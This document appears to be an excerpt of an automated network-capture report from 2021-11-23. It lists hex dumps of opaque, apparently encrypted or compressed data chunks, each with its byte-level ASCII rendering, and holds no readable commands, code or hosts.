dc 1a 7d 14 ec 6d 05 6a 1d 9f 55 d6 20 14 4d e7 ae 11 b6 df 12 af 13 06 26 8b 74 f7 0d 71 d3 80 01 aa 28 e3 6c 5d 61 ed 5f d0 15 bc b2 4f
                                                                                    Data Ascii: FB'wR{_RuTl*e[vGQNV"2ItRC^'_GR1Il;fE?>1Wwb$X$j@gQ,&?PA4;zv,g-n&\\D1cp)+FB*dKFnsfHQ,)IEe}mjU M&tq(l]a_O
                                                                                    2021-11-23 13:40:02 UTC45INData Raw: 3a 94 5e e2 09 b3 63 ce 74 3e d4 bf ab c9 14 2e 85 23 a4 25 70 d6 c0 07 72 74 cf 91 7c 2c 51 40 88 76 66 0a a1 76 4c 9d 4c 41 d7 71 03 4a 4b 32 f7 47 ef cf 9d c0 1c 8e 07 a5 20 7a 15 17 a8 09 30 73 5d 64 4a e6 78 45 50 c8 06 4b 59 05 39 05 f7 1a 81 95 f9 36 26 b2 29 23 ab 9d c0 f5 96 03 14 5d 13 cf af ec f2 27 cc 05 40 fd 2c c6 80 d0 03 bd 22 35 b3 c9 82 35 57 b7 ae dc 5a e0 7e 57 67 e5 b1 48 5e 94 aa 03 1e 30 99 b7 5e 56 b0 13 b4 07 4b d9 2c 83 dd 19 ba 50 f1 45 49 86 9a ba 52 14 d8 bd 75 19 30 bf 07 9e 9b 30 e6 ee 0e cc 08 65 37 08 74 26 52 01 58 65 dc 32 a8 83 d9 8a 03 1f c2 45 cb bc 71 b1 5b 0f 2e c2 e3 c7 e5 4b 6f 12 98 cb 53 9f e0 01 36 69 eb 37 d4 1f f3 d1 27 ed c1 d7 82 d7 62 32 1b 17 77 58 17 dd b1 d3 2d bc 5a a7 75 a9 84 c3 03 18 4f aa 4e 31 29
                                                                                    Data Ascii: :^ct>.#%prt|,Q@vfvLLAqJK2G z0s]dJxEPKY96&)#]'@,"55WZ~WgH^0^VK,PEIRu00e7t&RXe2Eq[.KoS6i7'b2wX-ZuON1)
                                                                                    2021-11-23 13:40:02 UTC47INData Raw: 16 c0 8c 05 30 f0 cf 8c a0 75 d5 a8 17 d3 e3 76 6c 59 0a 3c 56 fc 01 99 a2 5b 2f 7a ae 09 7b 6a 3d 96 56 5e 54 93 8e 3e 54 3a 8b 98 73 c0 cc e0 fd 4a e6 8d 33 e2 63 93 d0 01 c3 cc 4d be e8 24 6d ef af d8 b5 38 52 b2 18 8a 91 72 7c 15 d8 45 7a 87 95 ed 91 24 ab 1a f1 8f ae 6e f8 9b fa d8 d1 62 c0 9f 56 a5 f3 4c e9 6f 26 c9 df 4c 2d 55 d9 b0 d4 24 19 e0 e9 a1 8f b3 6c 36 61 ae d5 89 d2 d0 9d b9 be 7a 6d ee 2a 11 00 f4 5a c9 77 ad 67 91 50 b3 b4 fa 0b 11 60 78 a8 5a f8 3e 21 8e 5b b6 95 67 5a d8 92 5e 3d 25 52 f0 c2 c5 65 f2 1a 0a 5e a0 29 e1 c7 b8 54 90 e0 32 9b 86 f0 a7 36 86 21 3e c6 62 ce 52 a0 ed 1b e4 18 e2 57 5b b5 e2 cc 7a 65 71 53 a2 b6 aa 1a 0d b6 57 f7 97 7c de c7 45 f3 be ca 4d e2 b4 82 79 e5 1d 1b 12 61 4e 43 c3 69 a6 b1 fa 2d cd 26 13 14 91 83
                                                                                    Data Ascii: 0uvlY<V[/z{j=V^T>T:sJ3cM$m8Rr|Ez$nbVLo&L-U$l6azm*ZwgP`xZ>![gZ^=%Re^)T26!>bRW[zeqSW|EMyaNCi-&
                                                                                    2021-11-23 13:40:02 UTC48INData Raw: 74 ee 15 85 a9 19 9d 88 27 d1 30 db 99 04 c1 27 8a 3a 9b d9 f9 ac a7 9e 25 d8 20 13 fd 8a 56 fb 7d 04 91 bf 10 66 5a 89 d0 e9 40 73 e6 38 59 aa e1 fd f8 3b 3e b6 8a 91 3f 91 56 62 c5 3a 8e 1b 46 0d 7d c5 bf 68 64 1d 7b b9 7a aa 53 9b 0c 41 f8 9f 98 e9 0f 9a 0a ee eb 45 de 4f a1 af ef ce 3f 09 27 b0 96 24 98 5a fd 1e 62 e7 83 9f 22 51 e5 ec 2e e0 58 8d b1 ff eb 40 a1 e2 0d 5f 75 a0 27 1a 84 8b 65 c0 41 f4 33 27 0f 5c aa 67 3a 68 1f 76 11 d5 31 23 7d 66 96 0f 72 30 38 ed b3 b9 4a a7 9f 56 7c e9 df c6 80 39 8f 51 59 04 f4 56 29 5a 99 31 7f d9 b3 41 b6 0d 13 ec 21 04 9f cb e3 de 42 63 ea cf 9d fe 77 1f a6 a7 b6 a8 11 bf 2c f3 e9 e2 c3 1c 2d 78 14 26 ca 65 4c 82 16 55 28 b4 ce 96 9e a1 33 80 09 49 02 6c b8 6d 2c 8b 54 68 70 83 94 c9 be 1d 0a 03 16 6f c1 82 b6
                                                                                    Data Ascii: t'0':% V}fZ@s8Y;>?Vb:F}hd{zSAEO?'$Zb"Q.X@_u'eA3'\g:hv1#}fr08JV|9QYV)Z1A!Bcw,-x&eLU(3Ilm,Thpo
                                                                                    2021-11-23 13:40:02 UTC49INData Raw: 66 59 69 f4 5c 6d c2 06 96 21 9c ae 46 e7 12 ee 4b 7c b4 e9 ae ed df 0f 76 70 93 b3 4c a4 d5 d9 63 cc 11 ef d3 49 26 30 e0 0c 7b f8 2c 7f 04 2f dd 16 e0 6d 3a 42 ba 8e e7 98 a5 55 02 99 17 aa c0 14 6a 7d 8a 59 48 e2 6f cf 75 af 27 00 68 b9 f6 d3 1d 26 bb 7b ef ae 6e 34 11 38 86 44 0a 68 d2 49 6a 18 51 59 bb a3 3f 53 b5 b9 f5 b1 d5 8b 23 8a 68 e8 26 70 17 c4 13 01 59 41 5c e1 8d 7f ff 38 02 60 01 73 f2 5d 0a 29 12 05 5f 13 84 e6 e7 4b 4a 35 03 c3 41 7b 4a 67 e3 dd c6 c5 ef 82 d8 48 87 8c 9e b8 47 7c 5b a7 84 7a 33 21 6b 51 4d 3a fe ab 4c 16 ff 49 5e a5 6f 15 a0 23 ec 6b 9d 94 c0 85 11 bd bb 4f 7a bf c7 50 e7 00 86 2b ad e2 dc c7 f6 66 5b 04 1c 5f 6a 7f f9 87 54 cc 8d f6 7a a7 3d 06 72 d5 ff d2 00 21 16 e2 96 ec 5d 63 c6 54 ea 64 34 df bc ad 11 f9 86 cc ca
                                                                                    Data Ascii: fYi\m!FK|vpLcI&0{,/m:BUj}YHou'h&{n48DhIjQY?S#h&pYA\8`s])_KJ5A{JgHG|[z3!kQM:LI^o#kOzP+f[_jTz=r!]cTd4
                                                                                    2021-11-23 13:40:02 UTC50INData Raw: 36 af e4 89 ee e9 3b 1f 50 c4 91 0f 50 fc 1d 43 28 68 11 49 e7 db 8e ec d0 6f 5f bc e4 58 90 1a 30 ea 96 14 0d a3 2c 7d fd 2e 2f 4f 08 f1 d0 4b 18 f1 4e 21 ea 4d f1 93 b3 10 6d bc a0 5c 2f b7 d2 ce 59 bc c6 4d 14 24 ab 01 f4 2f 12 b2 85 21 d9 b5 02 b1 fc b1 6b 8a 8f 2f 23 a8 9d 4c 69 5f 0f 54 b1 49 aa 58 d6 f0 d0 af ed fc b5 bf d5 aa e4 c8 5d d8 ca c7 b1 ff 90 8c ef 76 b5 aa 8a 28 5d f1 f2 57 63 95 3a 65 4c 2f df 17 95 88 9b 68 d7 04 8a 98 40 fe 08 fe 74 49 9e 6e 7d b9 be 5d 02 83 36 be 71 31 a4 ef 3f 68 4f ab ea 78 7f 37 17 c6 7e 10 de 4f 63 f5 66 74 81 ba 9a 76 85 0c d0 3e ef 40 05 4e 96 80 1d b7 dc b8 66 c2 b8 61 18 6c a9 3e 76 bb de e2 52 ba 93 61 b5 17 cf f9 f5 c4 0a 70 cf 93 d9 f0 db 3e b5 f8 f9 6b 20 5a 16 bc 84 2f 13 0e 7b ca 35 ae e0 f5 6c 97 12
                                                                                    Data Ascii: 6;PPC(hIo_X0,}./OKN!Mm\/YM$/!k/#Li_TIX]v(]Wc:eL/h@tIn}]6q1?hOx7~Ocftv>@Nfal>vRap>k Z/{5l
                                                                                    2021-11-23 13:40:02 UTC51INData Raw: bf 02 8b 18 0c 16 fa d1 2b e5 e4 11 98 42 fe a2 f1 0d b8 a0 bc 87 08 3e 21 26 62 b4 79 81 6c 38 b5 0e 93 43 30 6c e6 d5 61 5a 8c a8 b7 95 99 f1 a8 b6 f2 67 e9 0a c2 96 9e cb 07 21 44 19 20 bc 79 36 5f 7d c1 41 c1 f2 aa 04 ac 63 12 55 89 ef a7 53 57 8e 12 8b 10 54 dc f5 b0 c2 aa 5b 27 5f 79 cc 8b dd ea 73 70 1d 62 80 03 91 ea b6 ff 3c 74 b5 ef 36 30 ea e3 ce 70 7a ca 81 80 44 44 71 7d c1 91 41 c2 7a d7 0e ff 1d 53 59 6d 33 35 d4 04 54 de bd 80 78 17 7a c5 2e fc 55 94 9b cc a2 f8 76 c4 33 02 7c fe df 5f 8f f2 1d ba 13 29 27 8b a0 22 a0 dc e6 69 69 0c 1f 8f 2f dd 06 c5 22 e0 3c e7 8b 50 81 01 df 99 06 f1 bc db 54 76 20 75 2b e8 f0 ca 51 f7 48 32 a7 45 79 90 08 45 bb 1f 06 9d 39 4d 67 d4 31 05 53 d1 81 d0 9f 03 8d 22 53 ac 3b 5e ab 34 6f aa 95 ed 99 4d 40 f4
                                                                                    Data Ascii: +B>!&byl8C0laZg!D y6_}AcUSWT['_yspb<t60pzDDq}AzSYm35Txz.Uv3|_)'"ii/"<PTv u+QH2EyE9Mg1S"S;^4oM@
                                                                                    2021-11-23 13:40:02 UTC52INData Raw: 58 7e fc 8c cd 5e 76 01 9d 63 f7 b5 e7 21 5b ae 05 1a f4 b5 b0 5f 50 ba db b2 25 fa df 2c 54 df 18 a3 7b e6 b8 6b dd e1 0d 52 f0 d8 42 0a ab 30 af 06 ed 28 05 bc ed 01 3b 27 be 4a fc 71 db 52 38 bc 2a a2 58 ac 91 dd c3 2b e4 e0 4a e7 df 5f 4f 52 22 d6 b7 e4 38 9a f9 6f 95 99 fd fe 84 e0 89 31 12 f1 00 ca a1 d0 be 5b 5f c1 4a 83 98 4a 32 1b b5 59 03 6c 6b b0 7d 2c be 21 01 75 15 85 a8 0d 35 48 11 f3 68 29 40 84 51 b0 13 79 80 48 cc 19 42 6e d5 f4 ac 0d 57 00 7f 2c a2 39 d7 a5 81 f1 86 0c 70 77 21 00 ef 91 f1 9f 33 94 f6 5a f9 89 06 cb ea 54 ee 93 77 45 f7 46 c8 3b 67 59 e2 d9 fa b6 40 51 6e 52 fd 26 5b 73 08 97 c6 ac c7 cf f7 b4 13 4d 45 2c f4 6b f2 d5 8f f2 08 8d 90 56 37 49 78 99 2e 0b 6a cf 25 20 5e 2c 43 1b 78 32 8b 88 74 94 df c1 60 32 40 10 91 d5 3e
                                                                                    Data Ascii: X~^vc![_P%,T{kRB0(;'JqR8*X+J_OR"8o1[_JJ2Ylk},!u5Hh)@QyHBnW,9pw!3ZTwEF;gY@QnR&[sME,kV7Ix.j% ^,Cx2t`2@>
                                                                                    2021-11-23 13:40:02 UTC54INData Raw: 8a 5d 76 46 b9 72 7e fe ee da 10 de 81 ac 78 45 61 2b 44 0a 3f a8 cb 76 b7 1e ba 42 b3 b6 42 49 47 60 92 bb 5c fb 3f 24 65 ef b7 95 a8 48 8a 83 b0 43 f6 52 e0 c8 4b 30 f4 0b c7 30 09 29 0d cd 10 68 92 e5 f5 49 86 f0 6a e7 93 21 d0 c4 49 89 42 a0 0b 21 16 19 2b 5c 74 f6 13 cc 7b 15 22 53 aa a7 b9 1f c6 a6 04 98 c2 7d dd c0 46 f7 8b dd 33 32 7c 83 25 cb e0 1d 00 64 31 bc 83 7a ac a3 36 57 5b 26 e4 10 ee 4f 2d d4 85 c7 29 ae 32 dd 64 4e 8e 50 9b b1 f7 ab 4b 6d 69 99 31 09 cf a9 be 16 92 13 e5 5e 32 10 6d 63 2d 4f 5c 95 8b aa ca 17 2e 85 23 cf 24 70 d7 89 63 72 7c 09 95 7d 3c 59 70 9c 76 66 c3 a0 13 4c 95 4d 4a d6 61 03 2a a7 33 f7 4e 14 a9 9d ce 34 8e 06 a5 66 ea 01 16 bb f0 37 1a a8 6b 4b ef e3 55 50 19 10 30 c5 0c 3a 68 ce b5 81 95 f8 34 5d d6 3d 23 af 29
                                                                                    Data Ascii: ]vFr~xEa+D?vBBIG`\?$eHCRK00)hIj!IB!+\t{"S}F32|%d1z6W[&O-)2dNPKmi1^2mc-O\.#$pcr|}<YpvfLMJa*3N4f7kKUP0:h4]=#)
                                                                                    2021-11-23 13:40:02 UTC55INData Raw: 42 0c 7b 68 de 87 df 7c 5c 41 0a c8 21 b6 f8 76 95 1a ae 5c 84 47 16 5b fe 01 e6 5a ac 4b 8c 19 cf 0b 74 3e 36 e9 79 0b ae c6 6c 86 6d fc c0 f0 65 f6 43 3b cb 50 4c 47 11 64 8b cc 54 b3 ce 73 f2 fe 54 8e e4 b6 a3 1b f1 c7 12 f5 f6 34 db d5 52 21 b2 67 4b a3 be 5e 16 8f d6 51 33 b9 d1 d4 7e 24 e8 b9 67 a6 8d dd a6 ae 3f 81 a8 4b ab 42 e9 2e d6 39 b2 97 79 e3 7b be 6b e8 70 e7 8d a3 8d 51 fc 2a b2 fb 9d 2d 32 e8 d6 20 b8 32 a8 de 75 84 f4 e9 6b 01 8c 04 21 55 d6 0b bd cd a1 d0 a5 b6 1e 94 04 88 01 26 d0 f2 a8 a2 77 d3 fd 87 15 98 e5 6c cc 8a f7 5e d6 19 e0 ca 0c 45 e8 2f 05 f8 34 2c c7 fa 58 d3 9d 1d 68 d4 1d 03 e4 5a 91 45 cc 17 87 e2 db b5 f2 f5 d6 d2 57 8d 8b c8 cb 73 72 ed a4 59 50 b0 6e d8 c8 b0 d3 b2 26 f8 08 f8 31 7f 80 82 40 30 8e ad 0c ee 77 39 fd
                                                                                    Data Ascii: B{h|\A!v\G[ZKt>6ylmeC;PLGdTsT4R!gK^Q3~$g?KB.9y{kpQ*-2 2uk!U&wl^E/4,XhZEWsrYPn&1@0w9
                                                                                    2021-11-23 13:40:02 UTC56INData Raw: 1f 41 4f e7 fd 45 c0 f5 04 30 c5 05 3f 01 cd 88 e7 95 d9 34 99 26 29 23 af a4 06 f5 a5 26 31 27 87 cf ab c5 7c 90 ce 7e f7 fd b7 e7 f4 d4 25 e4 4a f1 b2 c9 88 2c 7c 82 6f fa 5b e3 26 e3 1b c8 b5 4a 25 25 ac 03 05 10 b4 e8 7b 56 02 3c b6 7c fa d9 2a 87 8c 67 91 7c c3 63 97 a9 e1 0b 52 14 da bf a5 8b 57 bf 24 10 00 2d bc c5 04 c6 25 ac 91 9f 13 26 71 2a dc 49 a7 a5 a8 83 db 85 dd 03 3a 4c c0 ae de 9c 56 24 d6 cb 87 ce dd d8 56 13 b4 a4 62 b0 e0 07 34 7f 97 19 9b 1e d0 d2 73 59 1d f9 86 c1 4a 34 7d 14 2b 7d 51 6d 98 d3 d5 90 21 07 75 a9 e6 f2 93 14 2f d7 dc 31 21 69 84 82 b5 4a 1f 85 e1 09 5e 1a 44 d3 78 6f 08 0e 00 79 4a 4e 36 a6 a0 86 dc 72 a1 06 77 27 00 ee f1 ab ac 1d f3 fb 72 a0 39 2f cb f9 52 b7 82 69 4d f4 04 91 15 61 01 cd df a3 b6 46 47 48 64 8d 76
                                                                                    Data Ascii: AOE0?4&)#&1'|~%J,|o[&J%%{V<|*g|cRW$-%&q*I:LV$Vb4sYJ4}+}Qm!u/1!iJ^DxoyJN6rw'r9/RiMaFGHdv
                                                                                    2021-11-23 13:40:02 UTC58INData Raw: 98 25 ea 38 f0 fc 35 a6 b7 70 69 7a 78 05 01 83 dd c0 ed 53 a8 0d ee c7 ad 6c 63 d9 06 17 b3 62 3a d9 7b b3 d5 5e fe 47 70 89 5d 48 5f 15 c4 e2 d4 24 32 ea f2 8a 04 fd cf ee 14 a8 42 3c db 00 de b9 af 78 84 ea ba 13 62 dc c4 9b 77 a7 1e d2 41 b3 bb c8 0c 11 09 7a a3 0b fa 2f 24 e1 ec b7 bc 22 0d dc ea 5a 9f a1 53 f0 c8 eb 33 f4 52 4d 75 5f 40 e1 4d c6 69 82 e5 49 4a 86 79 e0 a2 c5 48 3e 80 1c 88 52 a0 e7 22 16 a0 a1 61 20 9f e2 00 2e 14 32 53 a2 a5 b9 f6 4c 32 50 f1 31 89 88 c1 56 f7 af df 33 63 f1 1f 71 a0 15 09 54 65 21 bc c3 78 ac 1a bb f3 0f 4b 13 b4 b8 4e 2d d4 f5 c2 29 ab be 79 3e 20 74 08 43 b0 f7 ab eb 68 69 c8 bd a4 94 c6 43 a6 c9 12 f5 5e e2 15 6d fe a1 3e 3c e5 8b b7 90 16 2e 85 23 cd 24 99 93 cc 07 03 74 ec c9 7c 2c 59 40 9e 76 7f 4c d1 74 3d
                                                                                    Data Ascii: %85pizxSlcb:{^Gp]H_$2B<xbwAz/$"ZS3RMu_@MiIJyH>R"a .2SL2P1V3cqTe!xKN-)y> tChiC^m><.#$t|,Y@vLt=
                                                                                    2021-11-23 13:40:02 UTC59INData Raw: 54 89 e0 b8 f9 52 b7 93 f7 5d 1d 5a f6 3b 95 59 01 ac a3 b6 4e 51 db 54 91 47 a4 70 bc 91 e3 de c1 cf a0 b2 d8 53 a4 36 f7 6d 72 d3 19 86 82 8b ec 50 a2 49 85 fe 9a 0e 98 cf 63 52 13 2a 45 1b 5b 34 53 ef 8f 97 ee c7 39 41 46 10 5b d3 e0 21 7f df b6 12 9d 40 5e 10 3e 8f 9b dc 9c bf 73 db 09 c4 00 d1 60 e1 84 ec 3f da d6 59 c7 a1 07 9a 36 7d 6c 0f 77 e3 f6 11 6e 58 f7 d1 e2 93 4e d5 19 92 34 a6 a6 95 a3 bc 94 ac b1 01 a4 00 8b b9 27 39 b0 c7 47 4b 27 21 40 72 5c e8 ff 7a ae 29 81 29 bb 77 b1 e5 49 67 b5 76 e7 19 e3 9a c0 af 7b 66 42 ff 2d 4a ab ea da 85 8c 36 2e 34 6b 9f 51 e3 50 ae 24 18 1a c2 ec 6d 09 05 05 9e 60 b4 08 1c b5 e5 b1 cb b6 df 1e c0 0b 07 43 e9 71 88 5a 71 57 fd 03 d1 98 e3 6a 41 fd 2a 80 d0 e4 91 08 34 40 be af 09 1b 42 d4 f5 76 4b aa e8 c4
                                                                                    Data Ascii: TR]Z;YNQTGpS6mrPIcR*E[4S9AF[!@^>s`?Y6}lwnXN4'9GK'!@r\z))wIgv{fB-J6.4kQP$m`CqZqWjA*4@BvK
                                                                                    2021-11-23 13:40:02 UTC60INData Raw: 11 b2 2e 85 23 db 32 70 13 f4 fe 71 45 09 98 d9 2c 59 40 88 60 66 ff dd 8f 4f ac 4d 79 72 71 03 4a b3 25 f7 62 6a 37 9e f1 34 e6 a2 a5 66 7a 15 00 bb 6c 4b 8a ab 54 4b 7e 47 45 50 d9 04 26 c5 9c 44 f8 cd 9c 81 5d 5c 34 5d 0a 29 35 af 6d 7d c9 94 32 17 d2 02 cf af e8 7c 86 ce 73 8f 91 2e f3 d8 c9 a1 e4 0a dc b2 df 88 7d 04 ee 8a ee 5f a6 a3 e3 67 e5 b5 5c 25 b0 d4 3f 18 07 b0 99 f9 56 ba 11 b6 6a fa 00 52 eb d9 70 a2 e5 40 63 6f 84 e1 1d 52 09 a3 d3 0c 9c 31 7f a5 10 2c 03 bc d3 04 a7 5c b9 4f 88 75 ca f0 2a bc 67 a7 b3 a8 26 a2 84 2b 28 e5 7c 40 ae 5a b2 56 22 ce 38 fb a2 9e cc 6e 5e 3b a4 fe 9e e0 11 34 72 71 05 cf 0a d4 0b fc 59 c1 d7 86 d7 4a 41 9b 2b 5e 6f 6d 0c 19 d3 29 be 21 11 75 0c 00 cd 0f 06 49 17 5e 31 29 46 84 93 b5 9f f9 a3 4d 1b 1d 17 c7 d3
                                                                                    Data Ascii: .#2pqE,Y@`fOMyrqJ%bj74fzlKTK~GEP&D]\4])5m}2|s.}_g\%?VjRp@coR1,\Ou*g&+(|@ZV"8n^;4rqYJA+^om)!uI^1)FM
                                                                                    2021-11-23 13:40:02 UTC61INData Raw: d1 98 e3 6c 58 0e 7c c7 bf 19 e4 a1 8d 82 be af 09 7d 40 29 31 e3 35 50 9f 19 26 97 3e 86 91 5f c6 c5 0e 0b 71 e1 f5 34 c8 70 a3 d7 81 0d dd 6d 86 ec a8 6b 87 dd 71 76 38 58 ac 35 a7 bf 8c e2 e7 7c 3b 7b fd 41 c0 b5 02 a8 0c e6 e3 27 0b ea 18 85 15 d1 62 ca 8b 7b b5 cd ad f5 a9 81 48 de 4a 3b 15 4c b3 d4 62 31 14 c2 11 5b 3d 46 ec 72 a8 fe 6d db 46 dd 3f 9c 86 45 2e 2b 11 0a dc a8 cb 77 e1 1d 12 72 1a b0 0c 49 11 60 7a bb 5c fa 29 3c 12 e7 59 95 e8 48 dc 83 5a 43 f6 53 b6 cb 15 03 46 0d 85 30 5f 29 e1 cd 90 69 c4 e6 cf 79 78 f0 2c e7 c5 21 3e c4 49 88 14 a3 27 11 a9 1f 72 5c 96 35 e2 cc 78 14 34 4b 51 ae de 1f 9d a6 82 5b 31 7d de c1 50 ff 43 53 54 32 27 83 73 0f 15 1d 03 65 27 b4 3a f4 31 a2 6d 57 0d 26 13 10 ec 4e 2b cc 06 ce c7 ae 68 dd 3c 4e 74 50 18
                                                                                    Data Ascii: lX|}@)15P&>_q4pmkqv8X5|;{A'b{HJ;Lb1[=FrmF?E.+wrI`z\)<YHZCSF0_)iyx,!>I'r\5x4KQ[1}PCST2'se':1mW&N+h<NtP
                                                                                    2021-11-23 13:40:02 UTC63INData Raw: 68 41 75 a9 81 f1 ea 17 48 d7 f7 31 dc 00 84 82 b4 4a 08 c1 48 2e 1e 1b e3 94 f4 40 09 0e d9 3e 2c 4d 3e 8e 50 c0 f1 72 0a 29 66 6f 00 ee 96 a8 c2 7d 94 fb 5d a0 20 48 cb f9 50 b7 56 39 45 ee 41 91 2a 28 59 fd dd a3 9b 0f 51 48 55 a4 5f 14 73 48 90 8b 73 88 cf a0 b3 5e 6e 1d 2c 90 6f 86 92 d7 f2 82 8a e4 dd 7b 49 e0 9d 63 a4 26 cf 87 27 13 df 0f 1b c8 35 c6 cf 39 94 1a c5 2d 69 0d 10 5b d2 73 88 11 bd 4b 10 6b b5 41 65 3e 8d 9b cd 43 bf c6 b8 f4 9a b4 d1 f0 95 84 45 73 da 50 40 34 4e 2c 9a cc 7f c0 6b 3a e3 fe 10 fd 05 ff b2 1b 92 b4 ac bc e7 34 a5 a6 00 68 a4 67 b7 d6 e0 13 00 8f cd 27 c4 f5 c7 d4 4a 52 77 f7 71 a6 e9 ab 61 e0 29 81 2b 3d e6 0c ff 2e 64 4f d3 d9 6f e3 9e c8 6e a6 66 e7 99 d4 94 1f ea 2a f2 8c 1f 61 34 e8 85 a2 bc 78 ae de 1b 06 d4 a3 6d
                                                                                    Data Ascii: hAuH1JH.@>,M>Pr)fo}] HPV9EA*(YQHU_sHs^n,o{Ic&'59-i[sKkAe>CEsP@4N,k:4hg'JRwqa)+=.dOonf*a4xm
                                                                                    2021-11-23 13:40:02 UTC64INData Raw: bc c3 68 ac ef 73 56 0d 27 13 88 63 4e 2d d5 f5 30 a5 ae fb dd 3c 7e f9 50 1b b1 f7 c3 66 7e 69 98 f8 bc 1b a9 43 17 91 12 7b 5e e2 02 6d 2f 6a 4e 3e 94 8b 33 47 16 2e 84 23 3f aa 70 d6 89 07 42 fb 08 90 7d 2c 25 cf 88 76 67 0a 69 f9 4c 9d 4d 41 c3 e1 03 4a b2 33 9f d7 17 ce 9c c0 89 1e 07 a5 67 7a 2d 87 bb 39 37 73 1c f4 4a e6 e3 45 60 4b 04 30 c4 05 95 93 ce ad 81 95 d1 a7 5d 0a 28 23 d3 37 00 f5 97 03 c6 b2 a7 cf ae e8 30 05 ce 7e f0 fd 8c 57 d9 d5 05 e4 b6 49 b2 c9 89 2c 72 14 88 df 5c e2 21 75 67 e5 b4 4a 55 b3 aa 03 18 36 3d 7f 5f 56 b9 11 1e ea fa d9 2d 87 3b d7 a3 7d e4 63 93 12 e1 0b 53 14 94 28 0e ad 31 bf 97 87 2c 03 bd c5 c8 51 23 ac 4b b9 54 be 56 2a be 67 9b 3d a8 83 dc 9d 5a 81 e4 4c e5 ae ca 2a 56 24 d5 cb 4d 5d 9e ff 6e 12 78 3c fe 9e e1
                                                                                    Data Ascii: hsV'cN-0<~Pf~iC{^m/jN>3G.#?pB},%vgiLMAJ3gz-97sJE`K0](#70~WI,r\!ugJU6=_V-;}cS(1,Q#KTV*g=ZL*V$M]nx<
                                                                                    2021-11-23 13:40:02 UTC65INData Raw: 7f 66 76 9f 14 55 cd ea bb f0 64 2a 88 34 a4 87 3f 50 ab ae 92 18 a1 1c 87 6d 5d 05 75 84 32 d0 6f 18 bc ff b2 b3 d2 df 5a 69 86 0d 7a 8d 3a 25 ae 7b 8a 81 ac 78 8c e9 08 59 b8 99 44 da 73 91 1e e4 60 b4 db 09 b1 e8 42 91 1e 4f 8e 41 22 34 65 3e 67 38 1b c7 b1 e2 61 5b de 8c 64 ca f6 0a b0 01 51 cc d0 17 ea 24 31 fe 6a 8c af 32 34 ac c6 bc d0 70 14 7a 31 ed 74 8b 03 c0 49 ab ad 0c 6f c7 b0 c6 ef 99 0d 15 f0 c8 ad 88 f2 b3 e6 f4 c8 46 08 c8 9b e0 16 14 c5 b0 fa a1 37 eb 6a 8a 06 15 42 ed fb a8 98 c4 e9 01 a7 b9 cf d2 22 a8 53 11 8e 76 cf c8 0b a7 30 7b 6a b9 ca 8b df bb 1b 70 8a 5d 09 35 21 e0 a4 b2 35 cb d9 de 5a 58 b0 ef ca fa d9 e8 8c 5e af 04 e8 5d 9b 4b ac 95 90 80 5d e3 3c 86 39 a1 15 df 24 3f 0d 48 36 f8 1c ed fa 14 de 48 5e 26 3f e0 1e d2 2d 33 7a
                                                                                    Data Ascii: fvUd*4?Pm]u2oZiz:%{xYDs`BOA"4e>g8a[dQ$1j24pz1tIoF7jB"Sv0{jp]5!5ZX^]K]<9$?H6H^&?-3z
                                                                                    2021-11-23 13:40:02 UTC66INData Raw: ca 98 99 6d eb ce ed 6c d1 74 92 fc 84 51 1e bf c3 1f 1b 18 99 fc 56 37 07 0a cb 28 cd 63 fc 7d a7 5e 41 8d 3c 3d 3c b9 86 d6 fe fe bc b1 78 a3 1b b1 7e a3 38 84 da 27 08 42 f6 2b a6 e3 3c 93 76 e6 50 64 c6 ee 7f e2 4d 78 20 57 f3 2f 2a 20 4d 23 cd ec 6e 0e 78 3a af dd eb 1c 25 e1 6c 02 f8 2a b3 54 59 0e eb 55 79 d8 22 b3 d4 bb 64 85 2e 20 9c db e0 a2 b8 d2 77 19 d4 99 ea 6e 7d a3 5c 5c 19 1e a8 0d 48 41 77 ae 47 d0 44 28 50 7b 18 fb 5a 15 57 51 63 2b 52 52 ae c0 84 3f 3b ea d4 30 55 6c 6c da 58 08 bc e0 66 7b 7d 68 86 71 3a b0 f9 5d 5f 2f 48 b7 d9 7d 05 d0 9a 77 e0 82 51 18 e9 a5 64 ee 59 11 83 e7 f1 84 2d e1 dd cb 91 7b 1a 78 a8 e2 7e 84 7b 72 48 35 54 49 43 ce 2c 3c ab e6 34 f0 b0 49 ad 70 43 54 d1 db 59 db 7e 13 de 45 09 28 de a7 f4 a6 59 76 78 b3 d7
                                                                                    Data Ascii: mltQV7(c}^A<=<x~8'B+<vPdMx W/* M#nx:%l*TYUy"d. wn}\\HAwGD(P{ZWQc+RR?;0UllXf{}hq:]_/H}wQdY-{x~{rH5TIC,<4IpCTY~E(Yvx
                                                                                    2021-11-23 13:40:02 UTC67INData Raw: 1d 82 51 da e9 53 5e f0 76 e1 72 fb 47 36 b3 07 cf 87 11 e9 86 53 27 0d df 6f 33 d9 d2 2f ab 52 7a 78 01 d2 16 97 8d 0b 8a bd e6 b5 62 ad ad 16 9f 10 40 03 2b 6f 34 c9 3a aa b9 a3 5a 35 1f 2a 4f 7d c0 a5 51 86 2e 87 e2 0b 95 49 14 b4 c2 b3 27 21 3e d7 47 c5 bf fa 9c 08 26 b7 5f 9a 13 1d f0 6c 28 1e 3f 88 00 c0 8a 5d cb 65 5d d2 f3 30 e8 0d a9 49 c5 68 a5 61 b5 be 88 03 50 1b 7c e2 dc 37 bb cd 0a 22 f0 42 77 98 b6 5e b0 82 5c 9c 80 1b a7 d7 d1 f2 f4 1d 59 7c 53 e4 6a 8a d4 82 02 68 6e 29 06 22 33 5c b5 bc ee 30 a7 49 75 b4 b8 02 06 49 f2 b7 4a 74 a3 41 e6 91 8a 62 67 4f a6 b0 5f 46 16 fa 0e b0 27 58 80 52 f6 8b 5b c5 80 12 de 4a ba 53 63 22 17 92 22 99 a9 30 05 f0 a1 35 a0 4c 1e 6e fc 68 a5 35 d8 1b 6b 47 68 7a 6c c4 ef 71 ef a8 5e 39 0d 45 9d e9 4f 73 10
                                                                                    Data Ascii: QS^vrG6S'o3/Rzxb@+o4:Z5*O}Q.I'!>G&_l(?]e]0IhaP|7"Bw^\Y|Sjhn)"3\0IuIJtAbgO_F'XR[JSc""05Lnh5kGhzlq^9EOs
